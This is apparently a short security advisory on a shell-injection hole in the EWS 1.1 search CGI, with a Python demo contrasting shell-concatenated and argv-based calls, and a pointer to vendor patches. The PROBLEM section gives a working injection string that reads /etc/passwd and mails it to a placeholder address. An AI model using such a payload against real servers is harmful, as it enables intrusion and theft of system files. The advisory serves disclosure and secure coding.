COMMAND

    CGI hole in EWS (Excite for Web Servers)

SYSTEMS AFFECTED

    Systems running EWS 1.1

PROBLEM

    Marc Merlin found the following.  While trying a query like
    "this and this and that" (with the quotes) on a server, he noticed
    an error.  It is a classic mistake:  the CGI launches a shell with
    whatever was given in the query (even though spaces are escaped
    with a '$').  Yet, the exploit remains simple:

        ";IFS="$";/bin/cat /etc/passwd|mail your_email_here;
        (or any other shell command you can think of)
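
    The flawed pattern next to a shell-free form, as an added example
    (not EWS code and not taken from the patches).  The echo backend,
    the function names and the sample queries are assumptions made for
    illustration, and the '$' space escaping is left out.

```python
import subprocess

# Constructed sample inputs. PHRASE is the quoted search from the advisory;
# MARKER has the same shape as the advisory's string but only echoes a word.
PHRASE = '"this and this and that"'
MARKER = '";echo INJECTED;"'


def vulnerable_search(query: str) -> str:
    """Flawed pattern: the query is pasted into a shell command line,
    so a '"' inside it closes the quoted argument early and the rest
    is parsed as shell syntax."""
    cmd = 'echo searching: "' + query + '"'
    done = subprocess.run(["/bin/sh", "-c", cmd],
                          capture_output=True, text=True)
    return done.stdout


def safe_search(query: str) -> str:
    """Same stand-in backend, but the query travels as a single argv
    element. No shell ever parses it, so quotes and semicolons stay
    plain data."""
    done = subprocess.run(["echo", "searching:", query],
                          capture_output=True, text=True)
    return done.stdout


if __name__ == "__main__":
    for q in (PHRASE, MARKER):
        print("query      :", q)
        print("vulnerable :", repr(vulnerable_search(q)))
        print("safe       :", repr(safe_search(q)))
```

    A quoted phrase search reaches the backend with its quotes eaten
    in the first form and intact in the second, which is the kind of
    symptom worth checking for when auditing other CGI wrappers.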

SOLUTION

    For more detailed information on the bug or to access the patches,
    go to the patches page at:

        http://www.excite.com/navigate/patches.html